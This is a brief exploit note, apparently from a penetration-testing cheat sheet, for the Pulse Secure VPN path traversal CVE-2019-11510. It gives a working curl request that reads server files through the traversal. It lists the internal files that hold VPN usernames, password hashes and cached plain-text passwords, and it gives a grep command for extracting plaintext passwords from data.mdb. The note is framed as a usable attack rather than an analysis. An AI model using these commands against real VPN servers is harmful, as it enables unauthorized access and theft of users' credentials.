Pulse Secure (CVE-2019-11510)

Description

There is a Path Traversal vulnerability on Pulse Secure VPN endpoint:

curl --path-as-is -k -D- 'https://<hostname>/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'

You can grab the following files:

/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb

The VPN user and hashed passwords are stored in the mtmp/system file, but when users log into the application, it caches the plain-text password into dataa/data.mdb.

grep 'password@9' data.mdb -a

Link

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101